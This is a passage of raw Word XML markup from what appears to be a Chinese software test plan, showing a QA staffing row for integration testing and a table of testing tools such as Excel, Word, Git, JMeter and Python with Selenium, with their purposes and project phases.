                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED76DA8"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63142093" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4274803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QA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1138" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A670E6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台令明</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA05225" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>杨康林</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="577C2F48"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X</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>x服务器的xx服务、xx数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="522EAED4"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lastRenderedPageBreak/>
              <w:t>人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1778" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63F5D467"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lastRenderedPageBreak/>
              <w:t>联调环境准备；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E26801"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联调资源提</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>供</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50BCE07A"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联调问题辅助定位</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78FC9AA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lastRenderedPageBreak/>
              <w:t>测试执行（联调测</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>试）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DC62648" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05B74664" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="163294BA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc222309957"/>
      <w:bookmarkStart w:id="201" w:name="_Toc227386339"/>
      <w:bookmarkStart w:id="202" w:name="_Toc227386482"/>
      <w:bookmarkStart w:id="203" w:name="_Toc36487900"/>
      <w:bookmarkStart w:id="204" w:name="_Toc36573221"/>
      <w:bookmarkStart w:id="205" w:name="_Toc36630298"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试所需工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
      <w:bookmarkEnd w:id="201"/>
      <w:bookmarkEnd w:id="202"/>
      <w:bookmarkEnd w:id="203"/>
      <w:bookmarkEnd w:id="204"/>
      <w:bookmarkEnd w:id="2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080"/>
        <w:gridCol w:w="1520"/>
        <w:gridCol w:w="1080"/>
        <w:gridCol w:w="1160"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1106"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="6E32BC5C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="2D805792"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工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="2FAC5821"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获取和访问地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="01BDA689"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用途</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="63AA8041"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支持人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="1F071715"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使用阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="6E0D4676"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使用时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
          </w:tcPr>
          <w:p w14:paraId="0E5501CD"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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="5838BF64" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B70F9AD"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Excell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28273D30" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>本机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04631E07"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导出case框架和</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>复用case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69839FDF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79992A17"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测试准备</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03F0ACC5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4320B125"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21415ACF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14134F3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W</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ord</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43D21245"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i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>本机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D13CA7D"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撰写方案、case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B4C0D0E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9D9E71"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测试准备</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CD40C0B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DDF0EA2"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04A7C089" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="634577B6"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Word</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B0E6A0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i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>本机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="730600AE"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撰写测试计划</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4854FC56" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F614315"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测试准备</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="515786A5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D55843"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1C2CA8A7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3291F21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G</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2401C157"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Wiki</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7262DDAD"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Pha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55DF2318" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>线上</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C522343" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="261FAF7D"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代码、文档、</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>bug</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>管理工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="289C027D"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李飞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0418321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测试准备</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F46EE3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测试执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2E1EA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测试总结</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="375AE8FA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35A87F69"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开设用户权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="31A79FB2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="784EC969"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Word</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0191AA93" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>本机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C496C65"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测试报告</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D031DD"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测试数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4915C20D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62C25399"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测试执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="540DFD7B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C23CEA"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1B1B7B5F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A63C7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Jmeter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326A820A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>本机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B0B872F"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性能压力测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="444DEFD7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CF6D5CE"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性能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="247543B6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B36AF8"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70FC7BB6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0858A5B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Python+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BDAD5F1"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selenium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="254E64AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B7930CA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:num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UI自动化测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03519D76" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
